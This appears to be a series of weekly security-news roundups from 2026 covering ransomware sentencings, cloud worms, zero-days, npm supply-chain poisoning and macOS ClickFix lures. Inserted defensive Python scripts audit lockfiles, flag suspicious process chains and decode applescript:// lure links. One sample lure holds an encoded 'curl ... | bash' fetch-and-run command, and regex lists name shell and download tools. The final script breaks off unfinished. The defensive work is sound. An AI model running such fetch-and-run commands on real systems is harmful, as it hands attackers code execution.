Cybersecurity Blog | SentinelOne
The Good, the Bad and the Ugly in Cybersecurity – Week 19

8 May 2026, 10:00

The Good | Courts Sentence Karakurt Ransomware Negotiator & Two DPRK IT Worker Scheme Facilitators

Federal authorities have secured a nearly nine-year prison sentence for Deniss Zolotarjovs, a Latvian national extradited to the U.S. for his role in the Karakurt extortion syndicate.

Operating as a “cold case” negotiator, Zolotarjovs (aka Sforza_cesarini) targeted victims who had stopped communicating with the group rather than pay. He mined stolen personal data and information about the target companies to apply psychological pressure, in some cases leveraging sensitive health information, including children’s medical records, to force the victim to pay.

Source: Dayton247now

The broader Karakurt operation has extorted an estimated $56 million from dozens of compromised organizations. As the first Karakurt member to face federal prosecution, Zolotarjovs’s sentencing is a hard-won milestone in ongoing efforts to dismantle international cyber-extortion rings.

In a separate case, two U.S. nationals were each sentenced to 18 months in prison for operating laptop farms that facilitated North Korean cyber infiltration.

Matthew Knoot and Erick Prince were prosecuted for helping DPRK-based IT workers secure remote employment at almost 70 U.S. companies using stolen identities. The pair received the company-issued laptops and installed unauthorized remote desktop software on them, allowing the North Korean workers to pass as legitimate domestic employees.

The FBI continues to warn about the thousands of North Korean IT workers seeking to infiltrate U.S. firms to steal intellectual property, implant malware, and siphon funds to the heavily sanctioned regime.

The Bad | PCPJack Worm Evicts TeamPCP, Steals Cloud Credentials at Scale

SentinelLABS researchers this week exposed PCPJack, a credential theft framework and cloud worm that targets publicly reachable infrastructure to harvest sensitive data.

Unlike other known cloud hacktools, the toolset hunts for, evicts, and deletes artifacts associated with TeamPCP, a threat group responsible for multiple high-profile supply chain intrusions earlier this year.

The multi-stage infection chain begins with a shell script called bootstrap.sh, which establishes persistence and downloads Python modules from an attacker-controlled Amazon S3 bucket. The malware harvests a wide range of credentials, including cloud access keys, Kubernetes service account tokens, Docker secrets, enterprise productivity application tokens, and cryptocurrency wallets. Unlike typical cloud-focused campaigns, PCPJack does not deploy cryptomining payloads on victims.

Beginning of bootstrap.sh, the dropper script

To achieve lateral movement, the framework exploits a number of web vulnerabilities, including severe Next.js and WordPress flaws, while aggressively scanning for poorly secured Docker, Redis, RayML, and MongoDB instances. Stolen data is then encrypted before being exfiltrated via attacker-controlled Telegram channels.

Security teams are advised to enforce multi-factor authentication on service accounts, restrict Kubernetes access scopes, keep secrets in an enterprise-wide vault, and secure all exposed cloud management interfaces.

The Ugly | Palo Alto Warns of Critical Flaw in PAN-OS Enabling Remote Code Execution

Palo Alto Networks customers were issued an urgent warning this week regarding a critical, unpatched zero-day vulnerability that is being exploited in the wild.

Tracked as CVE-2026-0300, the buffer overflow flaw affects the PAN-OS User-ID Authentication Portal (aka the Captive Portal), enabling unauthenticated attackers to execute arbitrary code with root privileges using specially crafted packets.

With a CVSS score of 9.3, the vulnerability presents an immediate risk to enterprise networks. The Shadowserver Foundation has so far identified over 5,000 vulnerable firewalls exposed online, concentrated in Asia and North America.

Source: Shadowserver (current as of this writing)

This actively exploited vulnerability adds to the growing pattern of targeting edge infrastructure. PAN-OS has a well-documented history of severe zero-days, and with 90% of Fortune 10 companies and many major U.S. banks depending on it, the exposure is significant. CISA has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, setting mandatory remediation deadlines for federal civilian agencies.

With a patch not expected until mid-May, Palo Alto is urging administrators to secure affected environments immediately, starting by confirming exposure via the device’s Authentication Portal Settings. To mitigate the risk of remote code execution, security teams can restrict User-ID Authentication Portal access to trusted internal IP addresses. Where strict network segmentation is not possible, organizations are advised to disable the Captive Portal service until the update can be applied.

The Good, the Bad and the Ugly in Cybersecurity – Week 18

1 May 2026, 10:00

The Good | Authorities Dismantle State-Backed Espionage & Cybercrime Rings

This week, authorities secured the extradition of Xu Zewei, an alleged Chinese Ministry of State Security (MSS) contract hacker, from Italy to the U.S. to face federal cyberespionage charges. Operating alongside the Silk Typhoon group, Xu compromised internet-facing systems during a coordinated intelligence-gathering campaign between February 2020 and June 2021. The DoJ says the attackers targeted COVID-19 research organizations, stealing vaccine and treatment data by exploiting Microsoft Exchange Server zero-day vulnerabilities and deploying web shells for deeper network access. Xu is set to appear in federal court, where he faces multiple counts of computer intrusion and conspiracy.

Source: Italian Justice System

European law enforcement agencies have dismantled a cryptocurrency investment fraud network blamed for over €50 million in estimated global losses. Structured almost like a legitimate enterprise, the syndicate employed up to 450 people across several call centers in Albania. Victims were lured through online advertisements and then handed to “retention agents”, who wore them down with high-pressure tactics and used remote access software to manipulate deposits. The proceeds were channeled into international money-laundering pipelines to evade authorities worldwide.

Evan Tangeman has received a nearly six-year prison sentence for laundering $230 million stolen in a cryptocurrency heist that took place between October 2023 and May 2025. According to court documents, the attackers initially breached a Washington D.C. victim by impersonating Gemini customer support and using remote desktop software to steal thousands of Bitcoin after bypassing two-factor authentication. Tangeman obfuscated the stolen proceeds through a network of cryptocurrency mixers, exchanges, and virtual private networks. The ill-gotten funds financed the criminal organization’s lavish lifestyle until his arrest.

The Bad | New Report Shows Scammers Stole $2.1 Billion from Social Media Users

The U.S. Federal Trade Commission (FTC) has warned of a sharp rise in social media fraud, with reported consumer losses exceeding $2.1 billion in 2025. Representing an eightfold increase since 2020, scammers used platforms such as Facebook, Instagram, and WhatsApp to reach nearly 30% of all fraud victims last year. Individuals reported losing more money to Facebook-originated schemes than to text and email campaigns combined, making the platform the primary fraud vector for almost every age demographic.

Who gets scammed more often, younger people or older adults? At the FTC we know scammers target everyone, and FTC Chairman @AFergusonFTC has a message that might surprise you: pic.twitter.com/8kveWbsM0e

— FTC (@FTC) April 27, 2026

Operating with global reach and minimal overhead, threat actors hijack legitimate user accounts, analyze personal posts to craft targeted social engineering lures, and buy deceptive advertisements. These criminal syndicates use the same marketing tools legitimate businesses employ, filtering potential victims by age, interests, and shopping habits to maximize returns.

In response to these findings, Meta says it removed more than 159 million scam advertisements and took down nearly 11 million malicious accounts tied to criminal operations last year. The company has also introduced anti-scam protections across its products, flagging suspicious friend requests, adding chat-based scam detection, and showing screen-sharing warnings on WhatsApp to disrupt fraudulent video calls.

Federal authorities urge users to limit profile visibility, independently verify unfamiliar online vendors, and reject unsolicited investment advice from unknown social media contacts.

The Ugly | Threat Actors Poison SAP-Related npm Packages in Supply Chain Attack

Cybersecurity researchers are tracking a supply chain attack targeting SAP-related npm packages with credential-stealing malware. Dubbed “Mini Shai-Hulud”, the campaign compromised packages within SAP’s cloud application development ecosystem, including @cap-js/db-service@2.10.1, @cap-js/postgres@2.2.2, @cap-js/sqlite@2.2.2, and mbt@1.2.48. The threat actors abused a gap in the packages’ npm OIDC trusted publishing configuration to exchange a CI identity token for publish rights and push poisoned versions to the registry.

Source: Aikido

Once installed, the malicious releases run a preinstall script that acts as a bootstrapper, downloading and executing a platform-specific Bun binary. The malware then harvests local developer credentials, GitHub and npm tokens, GitHub Actions secrets, cloud secrets from major providers, and passwords from multiple web browsers. For persistence, the payload targets AI coding agent configurations, injecting malicious files into Claude Code and Visual Studio Code settings so that it runs whenever an infected repository is opened. The malware also exits on Russian-locale systems, a trait that links the operation to earlier TeamPCP activity.

The stolen data is encrypted with AES-256-GCM and exfiltrated to public GitHub repositories created on the victim’s own account. Using GitHub as command-and-control (C2) and exfiltration infrastructure makes the traffic hard to distinguish from legitimate developer activity and difficult for security and development teams to trace or block.

The payload uses the stolen tokens to self-propagate, injecting malicious workflows into repositories it discovers and spreading the poisoned packages further. Package maintainers have released updated, clean versions of the affected packages.
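A quick way to check a project against this campaign is to scan the lockfile for the four release versions named above and, separately, to list every installed package that declares an install-time lifecycle script, since a preinstall hook is what gave the payload execution here. The script below is an added example written for this summary, not SentinelOne's, SAP's or Aikido's tooling. It assumes a lockfileVersion 2/3 package-lock.json (the "packages" map keyed by node_modules path), treats only the exact versions listed above as compromised, and runs on constructed sample data so it works offline.

```python
"""Audit an npm dependency tree for the Mini Shai-Hulud releases and install-time hooks."""
import json
from pathlib import Path

# Release versions named in the write-up above. Exact matches only; the
# maintainers' later clean releases are deliberately not flagged.
COMPROMISED_RELEASES = {
    "@cap-js/db-service": {"2.10.1"},
    "@cap-js/postgres": {"2.2.2"},
    "@cap-js/sqlite": {"2.2.2"},
    "mbt": {"1.2.48"},
}

# npm runs these automatically during `npm install`; preinstall was the
# campaign's entry point, but the others give the same code-execution primitive.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def package_name(lock_path: str) -> str:
    """'node_modules/@cap-js/sqlite' -> '@cap-js/sqlite' (also handles nested trees)."""
    return lock_path.rsplit("node_modules/", 1)[-1]


def audit_lockfile(lock: dict) -> list[str]:
    """Flag entries of a lockfileVersion 2/3 package-lock.json pinned to a known-bad release."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:  # "" is the root project entry, not a dependency
            continue
        name, version = package_name(path), meta.get("version", "")
        if version in COMPROMISED_RELEASES.get(name, set()):
            findings.append(f"{name}@{version} ({path}) is a known-compromised release")
    return findings


def audit_manifest(manifest: dict) -> list[str]:
    """Report install-time lifecycle scripts declared in an installed package.json."""
    scripts = manifest.get("scripts", {})
    name = manifest.get("name", "<unnamed>")
    return [f"{name}: '{hook}' runs on install: {scripts[hook]!r}"
            for hook in INSTALL_HOOKS if hook in scripts]


def audit_node_modules(root: Path) -> list[str]:
    """Walk node_modules and run audit_manifest on every package.json found."""
    findings = []
    for manifest_path in sorted(root.rglob("package.json")):
        try:
            findings.extend(audit_manifest(json.loads(manifest_path.read_text())))
        except (OSError, json.JSONDecodeError):
            continue  # unreadable or non-JSON files are not our concern here
    return findings


# Constructed sample lockfile (not a real project): two poisoned pins, one clean.
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/@cap-js/sqlite": {"version": "2.2.2"},
        "node_modules/@cap-js/postgres": {"version": "2.2.3"},
        "node_modules/mbt": {"version": "1.2.48"},
    },
}

# Constructed manifest shaped like the poisoned releases described above.
SAMPLE_MANIFEST = {
    "name": "@cap-js/sqlite",
    "version": "2.2.2",
    "scripts": {"preinstall": "node setup.js", "test": "jest"},
}

if __name__ == "__main__":
    for line in audit_lockfile(SAMPLE_LOCK) + audit_manifest(SAMPLE_MANIFEST):
        print(line)
```

Point audit_node_modules at a real checkout to get the hook inventory; any hook you did not expect deserves a look regardless of version. For CI runners, `npm ci --ignore-scripts` disables lifecycle scripts entirely, which would have neutralized this preinstall stage at the cost of breaking packages that legitimately need a build step.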

The Good, the Bad and the Ugly in Cybersecurity – Week 17

24 April 2026, 12:48

The Good | Two Cybercrime Leaders Face Justice for Fraud, Identity Theft & Extortion

Tyler Robert Buchanan, a 24-year-old British national believed to be a leader of the UNC3944 cybercrime group, has pleaded guilty in the U.S. to wire fraud and aggravated identity theft. Prosecutors say Buchanan and four accomplices stole at least $8 million in cryptocurrency by targeting employees at multiple organizations with SMS phishing attacks between 2021 and 2023. Victims were tricked into entering credentials on fake company login pages, allowing attackers to hijack email accounts, conduct SIM swaps, and drain cryptocurrency wallets.

Buchanan arrested in Spain (Source: Spanish National Police Corps)

Arrested in Spain in 2024 and extradited to the U.S. last year, Buchanan faces up to 22 years in prison at his sentencing this August. UNC3944 (aka 0ktapus, Scattered Spider) has been linked to major breaches at MGM Resorts International, Twilio, and Caesars Entertainment.

In a second guilty plea this week, Angelo Martino, a former ransomware negotiator at DigitalMint, has admitted to helping the BlackCat ransomware gang extort U.S. companies. Martino secretly shared clients’ confidential negotiation strategies and insurance policy limits with BlackCat operators, enabling them to demand larger ransoms. He also worked with other DigitalMint and Sygnia accomplices to launch ransomware attacks against multiple victims in 2023, targeting law firms, school districts, medical facilities, and financial firms. In one case, a victim paid over $25 million to settle the ransom.

Authorities have seized $10 million in Martino’s assets, including cryptocurrency and luxury vehicles. He faces up to 20 years in prison when sentenced in July on charges of conspiracy to interfere with interstate commerce by extortion and intentional damage to protected computers.

The Bad | Chinese-Linked Threat Actors Expand Botnets to Disguise Cyberattacks

The U.K.’s National Cyber Security Centre (NCSC-UK) and allied cyber agencies are warning that China-linked actors are increasingly relying on vast proxy networks of hijacked consumer devices to conceal cyberattacks and evade detection. A new joint statement details how the threat actors now route malicious traffic through compromised routers, cameras, recorders, and network-attached storage (NAS) devices instead of using rented infrastructure. This makes attacks harder to trace, since their true origin is masked.

Covert network typical setup (Source: NCSC-UK)

Officials say most China-nexus groups now use constantly shifting covert proxy networks, sometimes shared across multiple threat actors. These networks are mostly made up of small office/home office (SOHO) routers, smart devices, and Internet of Things (IoT) devices. One example is the Raptor Train botnet, which had infected more than 260,000 devices by 2024 and was linked by the FBI to the state-backed Flax Typhoon group and to Integrity Technology Group, which was sanctioned in January 2025. Another network, KV Botnet, has been tied to the PRC-backed Volt Typhoon group and targets end-of-life routers that no longer receive security updates. Although KV Botnet was disrupted by authorities in January 2024, Volt Typhoon actors had begun rebuilding it by November of the same year.

Authorities warn these botnets undermine traditional IP-blocking defenses because their infrastructure constantly changes. To reduce exposure, organizations are being urged to strengthen edge security by enforcing multi-factor authentication, maintaining updated inventories of internet-facing devices, using dynamic threat intelligence feeds, and adopting zero-trust controls. The advisory outlines the growing concern that everyday internet-connected devices are being weaponized at scale to support stealthy cyber operations targeting governments, telecom providers, defense contractors, and critical infrastructure worldwide.

The Ugly | ShadowBrokers Leak Links to Pre-Stuxnet Sabotage Framework

SentinelLABS has identified a previously undocumented cyber sabotage framework, tracked as “fast16”, with core components dating back to 2005. The operation centers on a kernel driver, fast16.sys, designed to intercept executable files in memory and subtly alter high-precision calculations to corrupt scientific and engineering outputs at scale.

The framework predates Stuxnet by at least five years and even early Flame-era tooling, making it one of the earliest known examples of a modular, Lua-based malware architecture. It was discovered alongside a companion service binary, svcmgmt.exe, which embeds a Lua virtual machine, encrypted bytecode, and system-level modules for propagation, persistence, and coordination across infected systems.

Unlike typical worms of its era, fast16 was engineered for targeted sabotage rather than indiscriminate spread. It selectively identifies compiled executables, particularly those using Intel toolchains, and injects rule-based modifications into floating-point computation routines.

SentinelLABS believes this could have introduced systematic errors into domains such as physics simulations, cryptographic research, and structural engineering models, undermining high-value scientific workloads without obvious system failure. The carrier component also functions as a self-propagating platform for “wormlets” (small wormable payloads), capable of spreading across networks using native Windows 2000/XP services and weak administrative credentials.

Structure of the internal storage
Wormlets stored in the carrier’s internal storage

SentinelLABS linked fast16.sys to the 2017 ShadowBrokers leak through deconfliction signatures of the kind the NSA used across its tooling ecosystem. Although full target attribution remains incomplete, matching code patterns suggest an alignment with high-precision simulation software used in engineering and defense research.

The fast16 framework offers a rare early glimpse into real-world operations in which kernel-level tampering, modular scripting, and precision sabotage logic were already converging. Although fast16 itself was built for now-obsolete operating systems, the SentinelLABS discovery pushes back the accepted timeline of modern tradecraft, showing that well-resourced actors were building long-lived implants that prefigured today’s state-backed cyber programs years earlier than previously thought.

The Good, the Bad and the Ugly in Cybersecurity – Week 16

17 April 2026, 10:00

The Good | U.S. Authorities Seize W3LL Phishing Ring & Jail DPRK IT Worker Scheme Facilitators

The FBI has dismantled the “W3LL” phishing platform, seized its infrastructure, and arrested its alleged developer in the bureau’s first joint crackdown on a phishing-kit developer with Indonesian authorities. Sold for $500 per kit, W3LL enabled criminals to clone login portals, steal credentials, bypass MFA using adversary-in-the-middle techniques, and launch business email compromise attacks.

The W3LL Store interface (Source: Group-IB)

Through the W3LL Store marketplace, more than 25,000 compromised accounts were sold, fueling over $20 million in attempted fraud. Even after the storefront shut down in 2023, the operation continued through encrypted channels under new branding, offering cybercriminals an end-to-end phishing service that was used against over 17,000 victims worldwide. Investigators say the takedown disrupted a criminal ecosystem that helped more than 500 threat actors steal access, hijack accounts, and commit financial fraud.

From the DoJ, two U.S. nationals have been sentenced for helping North Korean IT workers pose as American residents and secure remote jobs at more than 100 U.S. companies, including Fortune 500 firms. Court documents note that between 2021 and 2024, the scheme generated over $5 million for the DPRK and caused about $3 million in losses to victim companies. The defendants used stolen identities from over 80 U.S. citizens, created fake companies and financial accounts, and hosted company-issued laptops in U.S. homes so North Korean workers could secretly access corporate networks.

U.S. officials said the operation endangered national security by placing DPRK operatives inside American businesses. Kejia Wang was sentenced to nine years in prison and Zhenxing Wang to over seven years. Authorities say the broader network remains active, with additional suspects still at large, as North Korea continues to use fraudulent remote workers to fund government operations and evade sanctions.

The Bad | New “AgingFly” Malware Breaches Ukrainian Governments & Hospitals

Ukraine’s CERT-UA has uncovered a new malware campaign using a toolset called “AgingFly” to target local governments, hospitals, and possibly Ukrainian defense personnel.

The campaign, which CERT-UA tracks as UAC-0247, begins with phishing emails disguised as humanitarian aid offers that lure victims into opening malicious shortcut (LNK) files. These trigger a chain of scripts and loaders that ultimately deploy AgingFly, a C# malware strain that gives attackers remote control of infected systems.

Example of the infection chain (Source: CERT-UA)

Once installed, AgingFly can execute commands, steal files, capture screenshots, log keystrokes, and deploy additional payloads. It also uses PowerShell scripts to update configurations and retrieve command and control (C2) server details through Telegram, helping the malware remain flexible and persistent.

One notable feature is that it downloads pre-built command handlers as source code from the server and compiles them directly on the infected machine, reducing its static footprint and helping it evade signature-based detection tools.

Investigators found that the attackers use open-source tools such as ChromElevator to steal saved passwords and cookies from Chromium-based browsers, and ZAPiDESK to decrypt WhatsApp data. Additional tools like RustScan, Ligolo-ng, and Chisel support reconnaissance, tunneling, and lateral movement across compromised networks. CERT-UA says the campaign has impacted at least a dozen organizations and may also have targeted members of Ukraine’s defense forces.

To reduce exposure, the agency recommends blocking the execution of LNK, HTA, and JavaScript files, along with restricting trusted Windows utilities such as PowerShell and mshta.exe that are abused in the attack chain.
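The chain described above (shortcut file, script host, on-host compilation of downloaded C# handlers) leaves a recognizable process-tree shape that endpoint telemetry can catch even when the payload itself has never been seen. The rules below are an added example written for this summary, not CERT-UA's or SentinelOne's detection logic. The event shape (parent image, image, command line) mirrors Sysmon Event ID 1 or EDR process-creation telemetry, the sample events are constructed, and the third rule assumes the malware compiles via the .NET Framework CodeDOM provider, which shells out to csc.exe; in-memory Roslyn compilation leaves no such process and needs other telemetry.

```python
"""Score Windows process-creation events for the LNK -> script host -> on-host compile chain."""
from dataclasses import dataclass
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "cmd.exe"}
SCRIPT_ARGS = re.compile(r"\.(lnk|hta|js|jse|vbs|vbe|ps1)\b", re.I)
# Parents that legitimately drive the C# compiler on a workstation or build host.
BUILD_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe", "vbcscompiler.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path, e.g. C:\\Windows\\System32\\mshta.exe -> mshta.exe."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons (possibly none) an event matches the chain; each rule is independent."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    reasons = []
    # Stage 1: the user opens the shortcut; Explorer launches a script host whose
    # arguments name a script or shortcut file.
    if parent == "explorer.exe" and child in SCRIPT_HOSTS and SCRIPT_ARGS.search(ev.command_line):
        reasons.append("script host started from Explorer with a script/shortcut argument")
    # Stage 2: one script host hands off to another (the loader chain).
    if parent in SCRIPT_HOSTS and child in SCRIPT_HOSTS:
        reasons.append(f"script host chaining: {parent} -> {child}")
    # Stage 3: the implant compiles downloaded command-handler source on the host
    # (assumption: CodeDOM path, which spawns csc.exe).
    if child == "csc.exe" and parent not in BUILD_PARENTS:
        reasons.append(f"csc.exe spawned by {parent}: possible on-host compilation of downloaded source")
    return reasons


def detect(events) -> dict[int, list[str]]:
    """Map pid -> reasons for every event that trips at least one rule."""
    return {ev.pid: hits for ev in events if (hits := classify(ev))}


# Constructed telemetry (not from a real incident): three malicious stages plus two benign events.
SAMPLE_EVENTS = [
    ProcEvent(4012, r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\olena\Downloads\humanitarian_aid.js"'),
    ProcEvent(4020, r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\olena\AppData\Local\Temp\stage2.hta"),
    ProcEvent(4100, r"C:\Users\olena\AppData\Roaming\svchelper.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\olena\AppData\Local\Temp\h1.cmdline"'),
    ProcEvent(5000, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),  # interactive console, no script argument
    ProcEvent(5010, r"C:\Program Files\dotnet\dotnet.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              "csc.exe /noconfig @build.rsp"),  # legitimate build
]

if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        for reason in reasons:
            print(f"pid {pid}: {reason}")
```

Stage 3 is the highest-signal rule on hosts that are not developer machines: csc.exe launched by anything other than a build tool is rare enough to page on. The first two rules are noisier and are better used to stitch a tree together once one of the others fires, or paired with the LNK/HTA/JS execution blocks CERT-UA recommends.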

The Ugly | Attackers Exploit Nginx Auth Bypass Vulnerability to Hijack Servers

A critical vulnerability in Nginx UI, tracked as CVE-2026-33032, is being actively exploited in the wild to achieve full server takeover without authentication.

The flaw stems from an exposed /mcp_message endpoint in systems using Model Context Protocol (MCP) support, which fails to enforce proper authentication controls. As a result, remote attackers can invoke privileged MCP functions, including modifying configuration files, restarting services, and forcing automatic reloads to effectively gain complete control over affected Nginx servers.

Attacker-controlled page served by nginx (Source: Pluto Security)

Security researchers have reported that exploitation requires only network access. Attackers initiate a session via Server-Sent Events, open an MCP connection, retrieve a session ID, and then use it to send unauthenticated requests to the vulnerable endpoint.

This grants access to every exposed MCP tool, enabling attackers to inject malicious server blocks, exfiltrate configuration data, and trigger service restarts.

The vulnerability was patched in version 2.3.4 shortly after disclosure, but upgrading to 2.3.6, which includes further hardening, is now recommended. Despite the fix, active exploitation in the wild has been confirmed and proof-of-concept code is publicly available.

Nginx UI is widely used, with over 11,000 GitHub stars and hundreds of thousands of Docker pulls, and scans suggest roughly 2,600 exposed instances remain vulnerable globally. Attackers can establish MCP sessions, reuse session IDs, and chain requests to escalate privileges, enabling stealthy persistence, configuration tampering, and full administrative control over exposed systems.

Organizations are urged to update immediately, as exposed instances can be fully compromised by an unauthenticated attacker, bypassing traditional access controls and leaving the attacker with persistent control over the web infrastructure behind them.

The Good, the Bad and the Ugly in Cybersecurity – Week 15

10 April 2026, 10:00

The Good | DoJ Disrupts TP-Link Router Network Run by Russian Spy Org

This week, authorities in the U.S. carried out Operation Masquerade, a court-authorized operation to disrupt a DNS hijacking network run by Russia’s GRU Unit 26165 (APT28). The network involved the compromise of thousands of TP-Link small office/home office (SOHO) routers spread across more than 23 U.S. states.

Since at least 2024, APT28 operators have been exploiting known vulnerabilities in the devices to steal credentials, gain unauthorized access to router management interfaces, and silently rewrite DNS settings so that queries were redirected to GRU-controlled resolvers instead of the users’ normal providers. The actors then applied automated filtering on the hijacked traffic to pick out DNS requests of intelligence interest.

For selected targets, the resolvers returned forged DNS records for specific domains to insert GRU-controlled infrastructure into encrypted sessions. This allowed operators to collect passwords, authentication tokens, emails, and other sensitive data from devices on the same networks as the compromised routers, including users in government, military, and critical infrastructure sectors.

Russian espionage group APT28 compromised MikroTik and TP-Link routers to redirect traffic for certain authentication operations to AitM phishing kits

www.lumen.com/blog-and-new…

— Catalin Cimpanu (@campuscodi.risky.biz) 7 April 2026 at 17:10

Under court supervision, the FBI developed and deployed a series of commands to send to compromised routers. The operation captured evidence of GRU activity and reset the DNS configuration so the devices would obtain legitimate resolvers from their ISPs. It also blocked the original path the actors used for unauthorized access.

According to the DoJ, the FBI first tested the command set on the same TP-Link router models and firmware in a controlled environment, with the goal of leaving normal routing functions intact, avoiding access to any user content, and ensuring that owners could reverse the changes via a factory reset or the web management interface.

The bureau is now working with U.S. internet service providers to notify customers whose routers fell within the scope of the warrant.

The Bad | Threat Actors Turn to Script Editor to Bypass Apple’s ClickFix Mitigation

SentinelOne researchers have discovered a variant of the ClickFix social engineering trick targeting macOS users that avoids the need for victims to copy and paste commands into the Terminal. Apple recently updated the desktop operating system to include a mitigation for Terminal-driven ClickFix attacks, but threat actors have moved quickly to sidestep it.

In the campaign observed by SentinelOne, threat actors used a lure offering the Claude AI assistant to deliver AMOS malware. The lure leverages the applescript:// URL scheme to launch Script Editor from the user’s browser with the editor pre-populated with malicious commands. The delivery mechanism gives threat actors a smooth, Terminal-free attack flow that asks the user only for a few clicks, with no copy-paste involved.

Instructions to victims from a malicious web page
Script Editor opens with pre-populated malicious commands

Analysis of the payloads shows the technique is being used to deliver AMOS/Atomic Stealer, which reaches out to hardcoded C2 infrastructure and attempts to exfiltrate browser data, crypto wallets and password stores in a single run. SentinelOne customers are protected against AMOS and similar infostealer variants.

Researchers at Jamf later described a similar campaign using a webpage themed to look like an official Apple help page with instructions on how to reclaim disk space. Taken together, these campaigns suggest that Script Editor-driven ClickFix flows are becoming a reusable pattern rather than a one-off trick.

In the recent macOS Tahoe 26.4 update, Apple added a new security feature to warn users when pasting commands into the Terminal under certain conditions. Threat actors had moved towards the Terminal copy-paste method in response to Apple blocking a previous widely-used method of bypassing Gatekeeper via a Control-click override. However, the new Script Editor-based delivery mechanism entirely sidesteps these efforts and continues the long-running cat-and-mouse game between the operating system vendor and malware authors.
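Because the script body travels inside the link itself, a lure page of this kind can be triaged statically: pull every applescript:// URL out of the HTML, decode the query string, and look at what the pre-filled script would do. The helper below is an added example written for this summary, not SentinelOne's, Jamf's or Apple's code. It assumes the Script Editor scheme takes the form applescript://<bundle-id>?action=new&script=<percent-encoded body>, and the HTML it parses is a constructed fragment (example.invalid), not a captured lure.

```python
"""Pull applescript:// payloads out of a lure page and decode the pre-filled script for triage."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

APPLESCRIPT_URL = re.compile(r"""applescript://[^\s'"<>)]+""", re.I)
# Terms that indicate the pre-filled script runs shell commands or fetches a payload.
RISKY_TERMS = re.compile(r"do shell script|curl|wget|bash|sh -c|osascript|chmod|xattr|base64", re.I)


class LinkCollector(HTMLParser):
    """Collect applescript:// URLs from href/src/data-* attributes and inline event handlers."""

    def __init__(self):
        super().__init__()
        self.urls: list[str] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and (name in ("href", "src") or name.startswith(("data-", "on"))):
                self.urls.extend(APPLESCRIPT_URL.findall(value))


def decode_applescript_url(url: str) -> dict:
    """Split the URL and read action/script from the query (parse_qs percent-decodes for us).

    Assumption: the scheme carries the script body in a 'script' query parameter.
    """
    query = parse_qs(urlsplit(url).query)
    script = query.get("script", [""])[0]
    return {
        "url": url,
        "action": query.get("action", [""])[0],
        "script": script,
        "risky_terms": sorted({m.lower() for m in RISKY_TERMS.findall(script)}),
    }


def triage_page(html: str) -> list[dict]:
    """Return one decoded record per distinct applescript:// URL found in the page."""
    collector = LinkCollector()
    collector.feed(html)
    return [decode_applescript_url(u) for u in dict.fromkeys(collector.urls)]


# Constructed lure fragment: an "install" button whose target is Script Editor, not a download.
SAMPLE_HTML = """
<h2>Install Claude for Mac</h2>
<p>Step 1: click the button. Step 2: press Run in the window that opens.</p>
<a class="btn" href="applescript://com.apple.scripteditor?action=new&amp;script=do%20shell%20script%20%22curl%20-fsSL%20https%3A%2F%2Fexample.invalid%2Fs%20%7C%20bash%22">Install</a>
<a href="https://example.invalid/help">Need help?</a>
"""

if __name__ == "__main__":
    for record in triage_page(SAMPLE_HTML):
        print(record["action"], record["risky_terms"])
        print(record["script"])
```

A script whose decoded body contains `do shell script` feeding `curl ... | bash` is the Terminal-free equivalent of the copy-paste ClickFix payload; on the defensive side, the same regex can be applied to web proxy logs or mail-gateway link rewrites to spot applescript:// links before a user reaches the page.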

The Ugly | Iranian Hackers Target U.S. PLCs in Critical Infrastructure

Iran-affiliated APT actors are actively exploiting internet-facing operational technology (OT) devices, including Rockwell Automation/Allen-Bradley programmable logic controllers (PLCs), across multiple U.S. critical infrastructure sectors.

According to a joint advisory from CISA and other agencies, this activity has led to PLC disruptions, manipulation of data on HMI/SCADA displays, and in some cases operational disruption and financial loss. The authoring agencies assess that these Iranian-affiliated actors are conducting the campaign to cause disruptive effects inside the United States and note an escalation in activity since at least March 2026.

The campaign focuses on CompactLogix and Micro850 PLCs deployed in government services and facilities, water and wastewater systems, as well as the energy sector. Using leased third-party infrastructure together with configuration tools such as Rockwell’s Studio 5000 Logix Designer, the actors establish apparently legitimate connections to exposed PLCs over common OT ports including 44818, 2222, 102, and 502.

Once connected, they deploy Dropbear SSH on victim endpoints to gain remote access over port 22, extract project files such as .ACD ladder logic and configuration, and alter the process data operators see on HMI and SCADA dashboards. The same port-targeting pattern suggests the actors are also probing protocols used by other vendors, including Siemens S7 PLCs.
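The port list and the SSH foothold described above translate directly into a flow-log check. The following is an added example rather than anything from the advisory: it assumes a constructed controller inventory, an engineering-workstation allowlist, RFC 1918 as the definition of internal, and a CSV flow export in the format shown inline (external addresses use RFC 5737 documentation ranges).

```python
"""Flag internet-exposed PLC services and SSH to controllers in flow records.

Added example, not from the CISA advisory or SentinelOne. The asset inventory,
allowlist and flow records are constructed; "internal" means RFC 1918, and the
external addresses use RFC 5737 documentation ranges.
"""
import csv
import ipaddress
from collections import defaultdict
from io import StringIO
from typing import Dict, List

# Ports named in the advisory, with the OT protocols that normally live on them.
OT_PORTS = {
    44818: "EtherNet/IP (CIP explicit messaging)",
    2222: "EtherNet/IP (CIP implicit I/O)",
    102: "ISO-TSAP / Siemens S7comm",
    502: "Modbus/TCP",
}
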